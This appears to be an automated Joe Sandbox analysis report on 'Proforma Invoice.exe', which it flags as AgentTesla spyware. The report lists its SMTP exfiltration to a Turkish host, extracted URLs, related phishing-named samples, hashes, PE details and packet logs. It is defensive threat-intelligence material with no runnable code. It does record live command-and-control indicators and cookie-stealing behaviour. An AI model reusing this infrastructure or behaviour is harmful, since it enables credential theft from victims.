                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://LqBkoD7aW7iu.org0%Avira URL Cloudsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      webmail.karanex.com
                      		185.8.128.141
                      		truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://www.apache.org/licenses/LICENSE-2.0Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                            		high
                            http://DynDns.comDynDNSProforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/?Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haProforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://rafeBU.comProforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers?Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                		high
                                http://www.tiro.comProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                  		high
                                  http://webmail.karanex.comProforma Invoice.exe, 00000004.00000002.562871223.000000000319E000.00000004.00000001.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.goodfont.co.krProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.collada.org/2005/11/COLLADASchema9DoneProforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.ipify.org%$Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.carterandcone.comlProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                        		high
                                        https://api.ipify.org%GETMozilla/5.0Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        http://www.fonts.comProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://LqBkoD7aW7iu.orgProforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sakkal.comProforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipProforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, Proforma Invoice.exe, 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          185.8.128.141
                                          		webmail.karanex.comTurkey
                                          		3188ALASTYRTRtrue

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:502592
                                          Start date:14.10.2021
                                          Start time:05:18:10
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 8m 34s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:Proforma Invoice.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:21
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@5/2@1/1
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 0% (good quality ratio 0%)
                                          • Quality average: 0%
                                          • Quality standard deviation: 0%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 95.100.218.151, 95.100.218.79, 20.199.120.151, 20.82.209.183, 20.199.120.182, 20.54.110.249, 2.20.178.10, 2.20.178.56, 40.112.88.60, 52.251.79.25, 20.199.120.85, 2.20.178.33, 2.20.178.24
                                          • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          05:19:14API Interceptor748x Sleep call for process: Proforma Invoice.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          185.8.128.141Invoice Lists.exeGet hashmaliciousBrowse
                                            INV 20211012.exeGet hashmaliciousBrowse
                                              October Final Order.exeGet hashmaliciousBrowse
                                                PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                  20211006 PO.exeGet hashmaliciousBrowse
                                                    New_Order_PO#96072380_MT_QuoteRFQ.exeGet hashmaliciousBrowse
                                                      PO 20213009.exeGet hashmaliciousBrowse
                                                        New_Order_PO#96072380_MT_QuoteMTO.exeGet hashmaliciousBrowse
                                                          New_Order_PO#960780_MT_Quote-MT-valve.exeGet hashmaliciousBrowse
                                                            New_Order_PO#960780_MT_Quote-MT-valve.exeGet hashmaliciousBrowse
                                                              New_Order_PO#960780_MT_Quote-MT.exeGet hashmaliciousBrowse
                                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                                  pDKtDOf1YMseKzN.exeGet hashmaliciousBrowse
                                                                    New_Order_PO#960780_MT_Quote.exeGet hashmaliciousBrowse
                                                                      New_Order_PO#960780_MT_Quote-MT-RFQ.exeGet hashmaliciousBrowse
                                                                        9Jco42YF0nOEZbd.exeGet hashmaliciousBrowse
                                                                          New_Order_PO#960780_MT_Quote-MT-RFQ.exeGet hashmaliciousBrowse
                                                                            New_Order_PO#960780_MT_Quote-RFQ.exeGet hashmaliciousBrowse
                                                                              New_Order_PO#960780_MT_Quote1678.exeGet hashmaliciousBrowse
                                                                                #RFQ URGENT PO SAMPLE PRODUCT 09082021.exeGet hashmaliciousBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  webmail.karanex.comInvoice Lists.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  INV 20211012.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  October Final Order.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  20211006 PO.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  RFQ-Quote-REF-HYODA KM-Request (R ).exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  New_Order_PO#96072380_MT_QuoteRFQ.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  PO 20213009.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  Purchase Order NO202340.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  NEW ORDER.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  pDKtDOf1YMseKzN.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141

                                                                                  ASN

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  ALASTYRTRInvoice Lists.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  INV 20211012.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  TEKL#U0130F TALEP RFQ_PDF.exeGet hashmaliciousBrowse
                                                                                  • 5.2.87.216
                                                                                  October Final Order.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  20211006 PO.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  RESM#U0130 TEKL#U0130F VE F#U0130YAT TEKL#U0130F TALEB#U0130_PDF.exeGet hashmaliciousBrowse
                                                                                  • 5.2.87.216
                                                                                  TEKL#U0130F TALEP VE #U00dcR#U00dcN #U00d6ZELL#U0130KLER#U0130_PDF.exeGet hashmaliciousBrowse
                                                                                  • 5.2.87.216
                                                                                  RESM#U0130 SATIN ALMA S#U0130PAR#U0130#U015e#U0130_PDF.exeGet hashmaliciousBrowse
                                                                                  • 5.2.87.216
                                                                                  New_Order_PO#96072380_MT_QuoteRFQ.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  PO 20213009.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  New_Order_PO#96072380_MT_QuoteMTO.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  INVOICE.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.36
                                                                                  Z#U0130RAAT BANKASI #U00d6DEME TAVS#U0130YES#U0130_PDF.exeGet hashmaliciousBrowse
                                                                                  • 5.2.87.216
                                                                                  New_Order_PO#960780_MT_Quote-MT-valve.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  New_Order_PO#960780_MT_Quote-MT-valve.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  New_Order_PO#960780_MT_Quote-MT.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  NEW ORDER.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  pDKtDOf1YMseKzN.exeGet hashmaliciousBrowse
                                                                                  • 185.8.128.141
                                                                                  #U00d6DEME TAVS#U0130YES#U0130_PDF.exeGet hashmaliciousBrowse
                                                                                  • 5.2.87.216

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Proforma Invoice.exe.log
                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.355304211458859
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                  C:\Users\user\AppData\Roaming\ywwi1ck1.qnq\Chrome\Default\Cookies
                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.945284769091569
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  File name:Proforma Invoice.exe
                                                                                  File size:368128
                                                                                  MD5:dd00dde252a92512815c0d0d3679d1fd
                                                                                  SHA1:44ca2aa75de6ca79ae39408b48cd605d384a9a9b
                                                                                  SHA256:c0057025e69297714ba47f8fc982ec8fd8713f5a270a2d638257bcc395cad39f
                                                                                  SHA512:1bb62ebaa9b13a7e6f97ce09d671c25f46a6f5383d9f0afde4b83d0284cf75408c404fe50d3eb8ed1b4ac7094fc781fec4b370c3bbb4693106c2c2616d2c9fe4
                                                                                  SSDEEP:6144:K+7dXbJMkhB8krJuY9dUUIT7S6kTAzRZzJTON1AZkRGAY+w5SS6K4Wt+/y1Mt0cw:Kw+SBdQq0T7+8DFTODAZ/+dSP3k/y1M8
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga..............0.................. ........@.. ....................................@................................

                                                                                  File Icon

                                                                                  Icon Hash:00828e8e8686b000

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x45b3e6
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x6167859B [Thu Oct 14 01:19:23 2021 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5b3940x4f.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x5a4.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000x593ec0x59400False0.957230939251data7.95675018012IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x5c0000x5a40x600False0.421875data4.07883026947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x5e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_VERSION0x5c0900x314data
                                                                                  RT_MANIFEST0x5c3b40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain

                                                                                  Version Infos

                                                                                  DescriptionData
                                                                                  Translation0x0000 0x04b0
                                                                                  LegalCopyrightCopyright 2015 - 2021
                                                                                  Assembly Version1.0.0.0
                                                                                  InternalNamec.exe
                                                                                  FileVersion1.0.0.0
                                                                                  CompanyName
                                                                                  LegalTrademarks
                                                                                  Comments
                                                                                  ProductNameWin UsbInit
                                                                                  ProductVersion1.0.0.0
                                                                                  FileDescriptionWin UsbInit
                                                                                  OriginalFilenamec.exe

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  10/14/21-05:20:53.478836TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49841587192.168.2.3185.8.128.141
                                                                                  10/14/21-05:20:55.450868TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49842587192.168.2.3185.8.128.141

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 14, 2021 05:20:52.366280079 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:52.423247099 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:52.423511982 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.105591059 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.106681108 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.163875103 CEST58749841185.8.128.141192.168.2.3
